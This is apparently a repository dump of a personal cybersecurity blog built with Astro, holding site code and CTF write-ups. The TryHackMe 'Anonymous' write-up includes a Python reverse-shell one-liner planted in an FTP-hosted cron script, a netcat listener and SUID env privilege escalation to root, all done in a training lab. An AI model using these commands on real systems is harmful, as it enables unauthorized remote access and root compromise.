├── .gitignore ├── .vscode ├── extensions.json └── launch.json ├── README.md ├── astro.config.mjs ├── lighthouse-score.svg ├── package-lock.json ├── package.json ├── pnpm-lock.yaml ├── public ├── favicon.svg ├── logo.svg ├── placeholder.jpg ├── robots.txt └── verveimage.jpg ├── src ├── .env.example ├── assets │ └── gold.jpg ├── components │ ├── BaseHead.astro │ ├── FeaturedPosts.astro │ ├── Footer.astro │ ├── FormattedDate.astro │ ├── Header.astro │ ├── PostCard.astro │ ├── RecentPosts.astro │ ├── Search.tsx │ ├── SearchPosts.astro │ └── Socials.astro ├── config.ts ├── content │ ├── blog │ │ ├── annonforce.md │ │ ├── annonymous.md │ │ ├── anthem.md │ │ ├── artemis.md │ │ ├── attacking-kerberos.md │ │ ├── basic-malware-re.md │ │ ├── basic-xss.md │ │ ├── biohazard.md │ │ ├── blaster.md │ │ ├── blog-thm.md │ │ ├── blueprint.md │ │ ├── boiler-ctf.md │ │ ├── break-out-of-the-cage.md │ │ ├── brute-it.md │ │ ├── chocolate-factory.md │ │ ├── cicada-3301.md │ │ ├── ctf-collection-vol2.md │ │ ├── daily-bugle.md │ │ ├── dav.md │ │ ├── dogcat.md │ │ ├── easy-steganography.md │ │ ├── geolocating-images.md │ │ ├── git-happens.md │ │ ├── ha-jocker-ctf.md │ │ ├── introduction-to-reverse-engineering-part-1.md │ │ ├── introduction-to-reverse-engineering-part-2.md │ │ ├── jack-of-all-trades.md │ │ ├── lazy-admin.md │ │ ├── lian-yu.md │ │ ├── library-ctf.md │ │ ├── madness.md │ │ ├── mr-robot-ctf.md │ │ ├── nax.md │ │ ├── ninja-skills.md │ │ ├── o5YDmWb.png │ │ ├── password-cracking.md │ │ ├── pickle-rick-ctf.md │ │ ├── radare2.md │ │ ├── rp-web-scanning.md │ │ ├── simple-ctf.md │ │ ├── smag-grotto.md │ │ ├── stealthcopter-ctf.md │ │ ├── the-impossible-challenge.md │ │ ├── thompson.md │ │ ├── tomghost.md │ │ ├── ultratech-ctf.md │ │ ├── uopeasy.md │ │ ├── wireshark-ctf.md │ │ ├── wonderlands-ctf.md │ │ └── year-of-the-rabbit.md │ ├── config.ts │ └── images │ │ ├── annonforce │ │ └── hero.jpeg │ │ ├── annonymous │ │ └── hero.png │ │ ├── anthem │ │ └── hero.png │ │ ├── artemis │ │ ├── 
Untitled01.png │ │ ├── Untitled1.png │ │ ├── Untitled10.png │ │ ├── Untitled11.png │ │ ├── Untitled12.png │ │ ├── Untitled13.png │ │ ├── Untitled14.png │ │ ├── Untitled15.png │ │ ├── Untitled16.png │ │ ├── Untitled17.png │ │ ├── Untitled18.png │ │ ├── Untitled19.png │ │ ├── Untitled2.png │ │ ├── Untitled20.png │ │ ├── Untitled21.png │ │ ├── Untitled22.png │ │ ├── Untitled23.png │ │ ├── Untitled24.png │ │ ├── Untitled25.png │ │ ├── Untitled26.png │ │ ├── Untitled27.png │ │ ├── Untitled28.png │ │ ├── Untitled29.png │ │ ├── Untitled3.png │ │ ├── Untitled30.png │ │ ├── Untitled31.png │ │ ├── Untitled32.png │ │ ├── Untitled33.png │ │ ├── Untitled34.png │ │ ├── Untitled35.png │ │ ├── Untitled36.png │ │ ├── Untitled37.png │ │ ├── Untitled4.png │ │ ├── Untitled5.png │ │ ├── Untitled6.png │ │ ├── Untitled7.png │ │ ├── Untitled8.png │ │ ├── Untitled9.png │ │ └── hero.jpg │ │ ├── attackingkerberos │ │ ├── Untitled.png │ │ ├── Untitled1.png │ │ ├── Untitled2.png │ │ ├── Untitled3.png │ │ ├── Untitled4.png │ │ ├── Untitled5.png │ │ ├── Untitled6.png │ │ ├── Untitled7.png │ │ ├── Untitled8.png │ │ ├── Untitled9.png │ │ └── hero.jpg │ │ ├── basicmalware │ │ └── hero.jpeg │ │ ├── basicxss │ │ └── hero.jpg │ │ ├── biohazard │ │ └── hero.png │ │ ├── blogthm │ │ └── hero.png │ │ ├── blueprint │ │ └── hero.jpeg │ │ ├── boiler │ │ └── hero.jpeg │ │ ├── breakcage │ │ └── hero.jpeg │ │ ├── bruteit │ │ ├── Untitled.png │ │ ├── Untitled1.png │ │ ├── Untitled10.png │ │ ├── Untitled11.png │ │ ├── Untitled12.png │ │ ├── Untitled2.png │ │ ├── Untitled3.png │ │ ├── Untitled4.png │ │ ├── Untitled5.png │ │ ├── Untitled6.png │ │ ├── Untitled7.png │ │ ├── Untitled8.png │ │ ├── Untitled9.png │ │ └── hero.jpg │ │ ├── chocolatefactory │ │ └── hero.jpg │ │ ├── cicada │ │ └── hero.jpeg │ │ ├── ctfcollv2 │ │ └── hero.png │ │ ├── dailybugle │ │ ├── Untitled.png │ │ ├── Untitled1.png │ │ ├── Untitled10.png │ │ ├── Untitled11.png │ │ ├── Untitled12.png │ │ ├── Untitled13.png │ │ ├── Untitled14.png │ │ ├── 
Untitled2.png │ │ ├── Untitled3.png │ │ ├── Untitled4.png │ │ ├── Untitled5.png │ │ ├── Untitled6.png │ │ ├── Untitled7.png │ │ ├── Untitled8.png │ │ ├── Untitled9.png │ │ └── hero.png │ │ ├── dav │ │ └── hero.jpeg │ │ ├── default.png │ │ ├── dogcat │ │ └── hero.png │ │ ├── ethicalcourse │ │ └── hero.jpeg │ │ ├── ezsteg │ │ └── hero.png │ │ ├── geolocimages │ │ └── hero.jpeg │ │ ├── githappens │ │ └── hero.png │ │ ├── impossiblechallenge │ │ └── hero.png │ │ ├── introduction-to-reverse-engineering-part-1 │ │ ├── Image01.png │ │ ├── Image02.png │ │ ├── Image03.png │ │ ├── Image04.png │ │ ├── Image05.png │ │ ├── Image06.png │ │ ├── Image07.png │ │ ├── Image08.png │ │ ├── Image09.png │ │ ├── Image10.png │ │ ├── Image11.png │ │ ├── Image12.png │ │ ├── Image13.png │ │ ├── Image14.png │ │ ├── Image15.png │ │ ├── Image17.png │ │ ├── Image18.png │ │ ├── Image19.png │ │ ├── Image20.png │ │ ├── Image21.png │ │ ├── Image22.png │ │ └── hero.png │ │ ├── introduction-to-reverse-engineering-part-2 │ │ ├── XREF.png │ │ ├── afl++.png │ │ ├── checksec.png │ │ ├── document-1658231026.png │ │ ├── document-1658231086.png │ │ ├── document-1658231198.png │ │ ├── document-1658232014.png │ │ ├── elf-struct.png │ │ ├── hero.jpeg │ │ ├── httpd.png │ │ └── mips-reverse-shell.png │ │ ├── jacktrades │ │ └── hero.jpeg │ │ ├── jockerctf │ │ └── hero.jpeg │ │ ├── lazy-admin │ │ └── hero.jpeg │ │ ├── lian-yu │ │ └── hero.jpeg │ │ ├── libraryctf │ │ └── hero.jpeg │ │ ├── madness │ │ └── hero.png │ │ ├── mrrobotctf │ │ └── hero.jpg │ │ ├── nax │ │ └── hero.png │ │ ├── ninjaskills │ │ └── hero.png │ │ ├── passwordcrack │ │ └── hero.jpeg │ │ ├── pickle-rick-ctf │ │ └── hero.jpeg │ │ ├── radare2 │ │ └── hero.png │ │ ├── simple-ctf │ │ └── hero.png │ │ ├── smaggrotto │ │ └── hero.jpeg │ │ ├── stealthcopter-ctf │ │ └── hero.jpeg │ │ ├── stegcourse │ │ └── hero.jpeg │ │ ├── thompson │ │ └── hero.jpg │ │ ├── tomghost │ │ └── hero.jpeg │ │ ├── ultratechctf │ │ └── hero.png │ │ ├── uopeasy │ │ └── hero.jpg │ 
│ ├── webscan │ │ └── hero.png │ │ ├── wiresharkctf │ │ └── hero.jpeg │ │ ├── worderlandsctf │ │ └── hero.jpeg │ │ └── yearrabbit │ │ └── hero.jpeg ├── env.d.ts ├── layouts │ ├── MainLayout.astro │ └── PostLayout.astro ├── pages │ ├── 404.astro │ ├── blog │ │ ├── [...slug].astro │ │ └── index.astro │ ├── index.astro │ └── rss.xml.ts ├── socialicons.ts ├── styles │ └── base.css └── types.ts ├── tailwind.config.mjs └── tsconfig.json /.gitignore: -------------------------------------------------------------------------------- 1 | # build output 2 | dist/ 3 | 4 | # generated types 5 | .astro/ 6 | 7 | # dependencies 8 | node_modules/ 9 | 10 | # logs 11 | npm-debug.log* 12 | yarn-debug.log* 13 | yarn-error.log* 14 | pnpm-debug.log* 15 | 16 | # environment variables 17 | .env 18 | .env.production 19 | 20 | # macOS-specific files 21 | .DS_Store 22 | -------------------------------------------------------------------------------- /.vscode/extensions.json: -------------------------------------------------------------------------------- 1 | { 2 | "recommendations": ["astro-build.astro-vscode"], 3 | "unwantedRecommendations": [] 4 | } 5 | -------------------------------------------------------------------------------- /.vscode/launch.json: -------------------------------------------------------------------------------- 1 | { 2 | "version": "0.2.0", 3 | "configurations": [ 4 | { 5 | "command": "./node_modules/.bin/astro dev", 6 | "name": "Development server", 7 | "request": "launch", 8 | "type": "node-terminal" 9 | } 10 | ] 11 | } 12 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Personal blog about cyber security and challenges 2 | 3 | 👀 Profile on cybersecurity websites : 4 | 5 | - [TryHackMe](https://tryhackme.com/p/lascc) 6 | - [Root-Me](https://www.root-me.org/zeeph) 7 | - [HTB](https://www.hackthebox.eu/profile/157489) 8 | 9 | ## ✅ 
Lighthouse Score 10 | 11 |

12 | 13 | Verve Lighthouse Score 14 | 15 |

16 | 17 | ## Develop & Build 18 | 19 | Once installed or cloned locally and all packages are installed you can begin developing your site. 20 | 21 | ```console 22 | # Run localhost 23 | yarn install && yarn dev 24 | 25 | # Build your Gatsby site 26 | yarn clean && yarn build 27 | ``` 28 | 29 | ## Help 30 | 31 | For more information visit the [Theme repository.](https://github.com/aryanjha256/verve) 32 | 33 | ## 🧞 Commands 34 | 35 | All commands are run from the root of the project, from a terminal: 36 | 37 | | Command | Action | 38 | | :------------------------- | :----------------------------------------------- | 39 | | `pnpm install` | Installs dependencies | 40 | | `pnpm run dev` | Starts local dev server at `localhost:4321` | 41 | | `pnpm run build` | Build your production site to `./dist/` | 42 | | `pnpm run preview` | Preview your build locally, before deploying | 43 | | `pnpm run astro ...` | Run CLI commands like `astro add`, `astro check` | 44 | | `pnpm run astro -- --help` | Get help using the Astro CLI | 45 | -------------------------------------------------------------------------------- /astro.config.mjs: -------------------------------------------------------------------------------- 1 | import mdx from "@astrojs/mdx"; 2 | import sitemap from "@astrojs/sitemap"; 3 | import tailwind from "@astrojs/tailwind"; 4 | import { defineConfig } from "astro/config"; 5 | import { SITE_URL } from "./src/config"; 6 | 7 | import react from "@astrojs/react"; 8 | 9 | // https://astro.build/config 10 | export default defineConfig({ 11 | site: SITE_URL, 12 | integrations: [ 13 | tailwind({ 14 | applyBaseStyles: true, 15 | }), 16 | sitemap(), 17 | mdx(), 18 | react(), 19 | ], 20 | markdown: { 21 | shikiConfig: { 22 | theme: "one-dark-pro", 23 | }, 24 | }, 25 | }); 26 | -------------------------------------------------------------------------------- /lighthouse-score.svg: -------------------------------------------------------------------------------- 1 | 2 | 121 | 122 | 
123 | 124 | 100 125 | Performance 126 | , 127 | 128 | 129 | 100 130 | Accessibility 131 | , 132 | 133 | 134 | 100 135 | Best Practices 136 | , 137 | 138 | 139 | 100 140 | SEO 141 | 142 | 143 | 144 | 145 | 146 | 147 | 148 | 149 | 150 | 151 | 152 | 153 | 154 | 0-49 155 | 50-89 156 | 90-100 157 | 158 | 159 | -------------------------------------------------------------------------------- /package.json: -------------------------------------------------------------------------------- 1 | { 2 | "name": "verve", 3 | "type": "module", 4 | "version": "0.0.1", 5 | "scripts": { 6 | "dev": "astro dev", 7 | "start": "astro dev", 8 | "build": "astro check && astro build", 9 | "preview": "astro preview", 10 | "astro": "astro" 11 | }, 12 | "dependencies": { 13 | "@astrojs/check": "^0.5.2", 14 | "@astrojs/mdx": "^2.1.1", 15 | "@astrojs/partytown": "^2.0.4", 16 | "@astrojs/react": "^3.0.10", 17 | "@astrojs/rss": "^4.0.5", 18 | "@astrojs/sitemap": "^3.0.5", 19 | "@astrojs/tailwind": "^5.1.0", 20 | "@fontsource-variable/rubik": "^5.0.20", 21 | "@types/react": "^18.2.55", 22 | "@types/react-dom": "^18.2.19", 23 | "astro": "^4.3.5", 24 | "astro-beam": "^1.1.2", 25 | "fuse.js": "^7.0.0", 26 | "react": "^18.2.0", 27 | "react-dom": "^18.2.0", 28 | "sharp": "^0.33.2", 29 | "tailwindcss": "^3.4.1", 30 | "typescript": "^5.3.3" 31 | }, 32 | "devDependencies": { 33 | "@tailwindcss/typography": "^0.5.10" 34 | } 35 | } 36 | -------------------------------------------------------------------------------- /public/favicon.svg: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /public/logo.svg: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | -------------------------------------------------------------------------------- /public/placeholder.jpg: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/LasCC/Cyber-Security-Blog/c53b49d310a5e8eb2fc28fab4e757a72c78938ee/public/placeholder.jpg -------------------------------------------------------------------------------- /public/robots.txt: -------------------------------------------------------------------------------- 1 | User-agent: * 2 | Allow: / 3 | -------------------------------------------------------------------------------- /public/verveimage.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LasCC/Cyber-Security-Blog/c53b49d310a5e8eb2fc28fab4e757a72c78938ee/public/verveimage.jpg -------------------------------------------------------------------------------- /src/.env.example: -------------------------------------------------------------------------------- 1 | BEAMTOKEN="SAMPLE" -------------------------------------------------------------------------------- /src/assets/gold.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LasCC/Cyber-Security-Blog/c53b49d310a5e8eb2fc28fab4e757a72c78938ee/src/assets/gold.jpg -------------------------------------------------------------------------------- /src/components/BaseHead.astro: -------------------------------------------------------------------------------- 1 | --- 2 | interface Props { 3 | title: string; 4 | description: string; 5 | image?: string; 6 | } 7 | 8 | const canonicalURL = new URL(Astro.url.pathname, Astro.site); 9 | 10 | const { title, description, image = "/placeholder.jpg" } = Astro.props; 11 | --- 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | {title} 24 | 25 | 26 | 27 | 28 | 29 | 30 | 31 | 32 | 33 | 34 | 35 | 36 | 37 | 38 | 39 | 40 | -------------------------------------------------------------------------------- /src/components/FeaturedPosts.astro: 
-------------------------------------------------------------------------------- 1 | --- 2 | import { getCollection } from "astro:content"; 3 | 4 | import PostCard from "../components/PostCard.astro"; 5 | 6 | const posts = (await getCollection("blog")).sort( 7 | (a, b) => b.data.pubDate.valueOf() - a.data.pubDate.valueOf() 8 | ); 9 | 10 | const featuredPost = posts 11 | .filter((post) => post.data.featured === true) 12 | .slice(0, 3); 13 | --- 14 | 15 |

Featured Posts

16 | 28 | -------------------------------------------------------------------------------- /src/components/Footer.astro: -------------------------------------------------------------------------------- 1 | --- 2 | import { SITE_TITLE } from "../config"; 3 | import Socials from "./Socials.astro"; 4 | --- 5 | 6 | 16 | -------------------------------------------------------------------------------- /src/components/FormattedDate.astro: -------------------------------------------------------------------------------- 1 | --- 2 | interface Props { 3 | date: Date; 4 | } 5 | 6 | const { date } = Astro.props; 7 | --- 8 | 9 | 18 | -------------------------------------------------------------------------------- /src/components/Header.astro: -------------------------------------------------------------------------------- 1 | --- 2 | import { SITE_LOGO, SITE_TITLE } from "../config"; 3 | --- 4 | 5 |
8 | 9 | { 10 | SITE_LOGO ? ( 11 | {SITE_TITLE} 12 | ) : ( 13 | {SITE_TITLE} 14 | ) 15 | } 16 | 17 | 34 |
35 | -------------------------------------------------------------------------------- /src/components/PostCard.astro: -------------------------------------------------------------------------------- 1 | --- 2 | import FormattedDate from "./FormattedDate.astro"; 3 | 4 | interface Props { 5 | title: string; 6 | desc: string; 7 | href: string; 8 | pubDate: Date; 9 | } 10 | 11 | const { href, title, desc, pubDate } = Astro.props; 12 | --- 13 | 14 |
  • 15 | 16 |
    17 |
    18 |
    19 | 20 |
    21 |

    {title}

    22 |
    23 |

    {desc}

    24 |
    25 |
    26 |
  • 27 | -------------------------------------------------------------------------------- /src/components/RecentPosts.astro: -------------------------------------------------------------------------------- 1 | --- 2 | import { getCollection } from "astro:content"; 3 | 4 | import PostCard from "../components/PostCard.astro"; 5 | 6 | const posts = (await getCollection("blog")).sort( 7 | (a, b) => b.data.pubDate.valueOf() - a.data.pubDate.valueOf() 8 | ); 9 | 10 | const latestPost = posts.slice(0, 4); 11 | --- 12 | 13 |

    Recent Posts

    14 | 26 | 27 | 48 | 49 | -------------------------------------------------------------------------------- /src/components/Search.tsx: -------------------------------------------------------------------------------- 1 | import Fuse from "fuse.js"; 2 | import { useState } from "react"; 3 | 4 | const Search = (poststosearch: any) => { 5 | const [input, setinput] = useState(""); 6 | 7 | const fuse = new Fuse(poststosearch.poststosearch, { 8 | keys: ["data.title", "data.description"], 9 | }); 10 | 11 | return ( 12 | <> 13 |
    14 | 15 | 21 | 25 | 26 | 27 | 28 | 31 | 32 | { 40 | setinput(e.target.value); 41 | }} 42 | /> 43 |
    44 |
    45 | {fuse.search(input).map((result: any, index: any) => ( 46 | 47 |
    48 | {result.item.data.title} 49 |
    50 |
    51 | ))} 52 |
    53 | 54 | ); 55 | }; 56 | 57 | export default Search; 58 | -------------------------------------------------------------------------------- /src/components/SearchPosts.astro: -------------------------------------------------------------------------------- 1 | --- 2 | import { getCollection } from "astro:content"; 3 | import Search from "./Search"; 4 | 5 | const posts = await getCollection("blog"); 6 | --- 7 | 8 | 9 | -------------------------------------------------------------------------------- /src/components/Socials.astro: -------------------------------------------------------------------------------- 1 | --- 2 | import { SOCIALS } from "../config"; 3 | import socialicons from "../socialicons"; 4 | --- 5 | 6 |
    7 | { 8 | SOCIALS.filter((social) => social.active).map((social) => ( 9 | 14 | 15 | {social.linkTitle} 16 | 17 | )) 18 | } 19 |
    20 | -------------------------------------------------------------------------------- /src/config.ts: -------------------------------------------------------------------------------- 1 | import type { Socials } from "./types"; 2 | 3 | export const SITE_URL = "https://ludovic-coulon.com"; 4 | export const SITE_TITLE = "Ludovic COULON - Cybersecurity blog"; 5 | export const SITE_DESCRIPTION = 6 | "Ludovic COULON - Cybersecurity blog | Blog that brings together various articles on IT security and writeup about challenges I have achieved."; 7 | export const SITE_LOGO = "/logo.svg"; 8 | 9 | export const SOCIALS: Socials = [ 10 | { 11 | name: "Github", 12 | href: "https://github.com/LasCC", 13 | linkTitle: ` ${SITE_TITLE} on Github`, 14 | active: true, 15 | }, 16 | { 17 | name: "LinkedIn", 18 | href: "https://www.linkedin.com/in/ludovic-coulon/", 19 | linkTitle: `${SITE_TITLE} on LinkedIn`, 20 | active: true, 21 | }, 22 | ]; 23 | -------------------------------------------------------------------------------- /src/content/blog/annonymous.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: "Anonymous - TryHackMe" 3 | category: "THM" 4 | pubDate: 2020-05-19 5 | description: "Writeup for the Anonymous on TryHackMe" 6 | --- 7 | [TryHackMe | Anonymous](https://tryhackme.com/room/anonymous) 8 | 9 | Try to get the two flags! Root the machine and prove your understanding of the fundamentals! This is a virtual machine meant for beginners. 10 | Acquiring both flags will require some basic knowledge of Linux and 11 | privilege escalation methods. 12 | 13 | For more information on Linux, check out [Learn Linux](https://tryhackme.com/room/zthlinux) 14 | 15 | --- 16 | 17 | ### #1 Enumerate the machine. How many ports are open? 
18 | 19 | ``` 20 | ➜ TryHackMe nmap -A -vv 10.10.131.140 21 | ``` 22 | 23 | ``` 24 | 21/tcp open ftp vsftpd 2.0.8 or later 25 | |_clamav-exec: ERROR: Script execution failed (use -d to debug) 26 | |_sslv2-drown: 27 | 28 | 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) 29 | |_clamav-exec: ERROR: Script execution failed (use -d to debug) 30 | 31 | 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 32 | |_clamav-exec: ERROR: Script execution failed (use -d to debug) 33 | 34 | 445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 35 | |_clamav-exec: ERROR: Script execution failed (use -d to debug) 36 | Service Info: Host: ANONYMOUS; OS: Linux; CPE: cpe:/o:linux:linux_kernel 37 | ``` 38 | 39 | ### #2 What service is running on port 21? 40 | 41 | ``` 42 | 21/tcp open ftp vsftpd 2.0.8 or later 43 | |_clamav-exec: ERROR: Script execution failed (use -d to debug) 44 | |_sslv2-drown: 45 | ``` 46 | 47 | ``` 48 | ftp 49 | ``` 50 | 51 | ### #3 What service is running on ports 139 and 445? 52 | 53 | ``` 54 | smb 55 | ``` 56 | 57 | ### #4 There's a share on the user's computer. What's it called? 58 | 59 | ![](https://imgur.com/4X6K5lM.png) 60 | 61 | ![](https://imgur.com/5Aznrzp.png) 62 | 63 | ``` 64 | ➜ TryHackMe smbclient -L 10.10.131.140 65 | Enter WORKGROUP\kali password: 66 | 67 | Sharename Type Comment 68 | --------- ---- ------- 69 | print$ Disk Printer Drivers 70 | pics Disk My SMB Share Directory for Pics 71 | IPC$ IPC IPC Service (anonymous server (Samba, Ubuntu)) 72 | SMB1 disabled -- no workgroup available 73 | ``` 74 | 75 | ``` 76 | pics 77 | ``` 78 | 79 | ### #5 user.txt 80 | 81 | Let's go to the ftp using the anonymous login 82 | 83 | ``` 84 | ➜ TryHackMe ftp 10.10.215.153 85 | Connected to 10.10.215.153. 86 | 220 NamelessOne FTP Server! 87 | Name (10.10.215.153:kali): anonymous 88 | 331 Please specify the password. 89 | Password: no password there 90 | 230 Login successful. 
91 | Remote system type is UNIX. 92 | Using binary mode to transfer files. 93 | ftp> ls 94 | 200 PORT command successful. Consider using PASV. 95 | 150 Here comes the directory listing. 96 | drwxrwxrwx 2 111 113 4096 May 17 21:30 scripts 97 | 226 Directory send OK. 98 | ftp> cd scripts 99 | 250 Directory successfully changed. 100 | ftp> ls -la 101 | 200 PORT command successful. Consider using PASV. 102 | 150 Here comes the directory listing. 103 | drwxrwxrwx 2 111 113 4096 May 17 21:30 . 104 | drwxr-xr-x 3 65534 65534 4096 May 13 19:49 .. 105 | -rwxr-xrwx 1 1000 1000 314 May 14 14:52 clean.sh 106 | -rw-rw-r-- 1 1000 1000 86 May 17 22:55 removed_files.log 107 | -rw-r--r-- 1 1000 1000 68 May 12 03:50 to_do.txt 108 | 226 Directory send OK. 109 | ``` 110 | 111 | Let's put a reverse shell in the ftp shall we ? c: 112 | 113 | [Reverse Shell Cheat Sheet](http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet) 114 | 115 | You can use whatever you want I will use the python reverse shell. 116 | 117 | ``` 118 | python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.9.2.228",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' 119 | ``` 120 | 121 | Rename the payload 'clean.sh' and put it in the ftp 122 | 123 | ``` 124 | ftp> put clean.sh 125 | local: clean.sh remote: clean.sh 126 | 200 PORT command successful. Consider using PASV. 127 | 150 Ok to send data. 128 | 226 Transfer complete. 129 | 226 bytes sent in 0.00 secs (2.3427 MB/s) 130 | ``` 131 | 132 | Now let's wait the ftp server to execute the payload 133 | 134 | ``` 135 | ➜ TryHackMe nc -lnvp 4444 136 | listening on [any] 4444 ... 
137 | connect to [10.9.2.228] from (UNKNOWN) [10.10.215.153] 37426 138 | /bin/sh: 0: cant access tty; job control turned off 139 | $ ls 140 | pics 141 | user.txt 142 | $ cat user.txt 143 | 90d6f992585815ff991e68748c414740 144 | ``` 145 | 146 | ### #6 root.txt 147 | 148 | ``` 149 | $ find / -perm -u=s -type f 2>/dev/null 150 | /snap/core/8268/bin/mount 151 | /snap/core/8268/bin/ping 152 | /snap/core/8268/bin/ping6 153 | /snap/core/8268/bin/su 154 | /snap/core/8268/bin/umount 155 | /snap/core/8268/usr/bin/chfn 156 | /snap/core/8268/usr/bin/chsh 157 | /snap/core/8268/usr/bin/gpasswd 158 | /snap/core/8268/usr/bin/newgrp 159 | /snap/core/8268/usr/bin/passwd 160 | /snap/core/8268/usr/bin/sudo 161 | /snap/core/8268/usr/lib/dbus-1.0/dbus-daemon-launch-helper 162 | /snap/core/8268/usr/lib/openssh/ssh-keysign 163 | /snap/core/8268/usr/lib/snapd/snap-confine 164 | /snap/core/8268/usr/sbin/pppd 165 | /snap/core/9066/bin/mount 166 | /snap/core/9066/bin/ping 167 | /snap/core/9066/bin/ping6 168 | /snap/core/9066/bin/su 169 | /snap/core/9066/bin/umount 170 | /snap/core/9066/usr/bin/chfn 171 | /snap/core/9066/usr/bin/chsh 172 | /snap/core/9066/usr/bin/gpasswd 173 | /snap/core/9066/usr/bin/newgrp 174 | /snap/core/9066/usr/bin/passwd 175 | /snap/core/9066/usr/bin/sudo 176 | /snap/core/9066/usr/lib/dbus-1.0/dbus-daemon-launch-helper 177 | /snap/core/9066/usr/lib/openssh/ssh-keysign 178 | /snap/core/9066/usr/lib/snapd/snap-confine 179 | /snap/core/9066/usr/sbin/pppd 180 | /bin/umount 181 | /bin/fusermount 182 | /bin/ping 183 | /bin/mount 184 | /bin/su 185 | /usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic 186 | /usr/lib/dbus-1.0/dbus-daemon-launch-helper 187 | /usr/lib/snapd/snap-confine 188 | /usr/lib/policykit-1/polkit-agent-helper-1 189 | /usr/lib/eject/dmcrypt-get-device 190 | /usr/lib/openssh/ssh-keysign 191 | /usr/bin/passwd 192 | /usr/bin/env 193 | /usr/bin/gpasswd 194 | /usr/bin/newuidmap 195 | /usr/bin/newgrp 196 | /usr/bin/chsh 197 | /usr/bin/newgidmap 198 | /usr/bin/chfn 199 | 
/usr/bin/sudo 200 | /usr/bin/traceroute6.iputils 201 | /usr/bin/at 202 | /usr/bin/pkexec 203 | $ ./env /bin/sh -p 204 | /bin/sh: 4: ./env: not found 205 | $ /usr/bin/env /bin/sh -p 206 | /usr/bin/env /bin/sh -p 207 | $ id 208 | uid=1000(namelessone) gid=1000(namelessone) euid=0(root) groups=1000(namelessone),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lxd) 209 | ``` 210 | 211 | [All the suid shell on GTFOBins | GTFOBins](https://gtfobins.github.io/#+suid) 212 | 213 | ``` 214 | $ cd /root/ 215 | cd /root/ 216 | $ ls 217 | ls 218 | root.txt 219 | $ cat root.txt 220 | cat root.txt 221 | 4d930091c31a622a7ed10f27999af363 222 | ``` 223 | 224 | 225 | -------------------------------------------------------------------------------- /src/content/blog/basic-malware-re.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: "Basic Malware RE - TryHackMe" 3 | category: "THM" 4 | pubDate: 2020-08-27 5 | description: "This room aims towards helping everyone learn about the basics of Malware Reverse Engineering" 6 | --- 7 | 8 | [TryHackMe | Basic Malware RE](https://tryhackme.com/room/basicmalwarere) 9 | 10 | These challenges are aimed towards learning about the "Static Analysis" technique used to analyze the malware. The main aim for this room is not to used any types of debuggers neither the executable's/programs should be run on any platform. You are required to answer all the questions without even using the debugger and even not executing the executable's/programs. 11 | 12 | Meanwhile all the credits goes to **@MalwareTechBlog** for creating these awesome challenges. 13 | 14 | --- 15 | 16 | # Strings :: Challenge 1 17 | 18 | This executable prints an MD5 Hash on the screen when executed. Can you grab the exact flag? 19 | 20 | Note: You don't need to run the executable! 
21 | 22 | ### **#1 What is the flag of which that MD5 gets generated?** 23 | 24 | Let's start reverse engineering the first flag by launching IDA 25 | 26 | ![](https://i.imgur.com/yttOJFV.png) 27 | 28 | ![](https://i.imgur.com/YGXMw5F.png) 29 | 30 | As you can see, the instruction `mov eax, off_432294` copies the value stored at the memory address `off_432294` (a pointer to the flag string) into the EAX register. 31 | 32 | You can see the flag by hovering the mouse over the address. 33 | 34 | ![](https://i.imgur.com/oFYdrs5.png) 35 | 36 | ![](https://i.imgur.com/BoXqCXn.png) 37 | 38 | ``` 39 | FLAG{CAN-I-MAKE-IT-ANYMORE-OBVIOUS} 40 | ``` 41 | 42 | # Strings :: Challenge 2 43 | 44 | This executable prints an MD5 Hash on the screen when executed. Can you grab the exact flag? 45 | 46 | **Note: You don't need to run the executable!** 47 | 48 | --- 49 | 50 | ### **#1 What is the flag of which that MD5 gets generated?** 51 | 52 | Like the first one, let's start reversing with IDA 53 | 54 | ![](https://i.imgur.com/FNAAo9X.png) 55 | 56 | Well, this one is pretty straightforward: you just need to decode the hex values into ASCII. 57 | 58 | ![](https://i.imgur.com/heSWxWN.png) 59 | 60 | ``` 61 | FLAG{STACK-STRINGS-ARE-BEST-STRINGS} 62 | ``` 63 | 64 | # Strings 3 :: Challenge 3 65 | 66 | This executable prints an MD5 Hash on the screen when executed. Can you grab the exact flag? 67 | 68 | Note: You don't need to run the executable! 
69 | 70 | --- 71 | 72 | ### **#1 What is the flag of which that MD5 gets generated?** 73 | 74 | For this one use GHIDRA and follow the image bellow 🙄 75 | 76 | ![](https://i.imgur.com/PrAITp0.png) 77 | 78 | ``` 79 | FLAG{RESOURCES-ARE-POPULAR-FOR-MALWARE} 80 | ``` 81 | -------------------------------------------------------------------------------- /src/content/blog/basic-xss.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: "Basic XSS - Google" 3 | category: "XSS" 4 | pubDate: 2020-11-27 5 | description: "This room aims towards helping everyone learn about the basics of xss" 6 | --- 7 | [ XSS-Game Website ](https://xss-game.appspot.com/level1) 8 | 9 | # Level 1: Hello, world of XSS 10 | 11 | ## Mission Description 12 | 13 | This level demonstrates a common cause of cross-site scripting where user input is directly included in the page without proper escaping. 14 | Interact with the vulnerable application window below and find a way to make it execute JavaScript of your choosing. You can take actions inside the vulnerable window or directly edit its URL bar. 15 | 16 | ## Mission Objective 17 | 18 | Inject a script to pop up a JavaScript alert() in the frame below. 19 | Once you show the alert you will be able to advance to the next level. 20 | 21 | 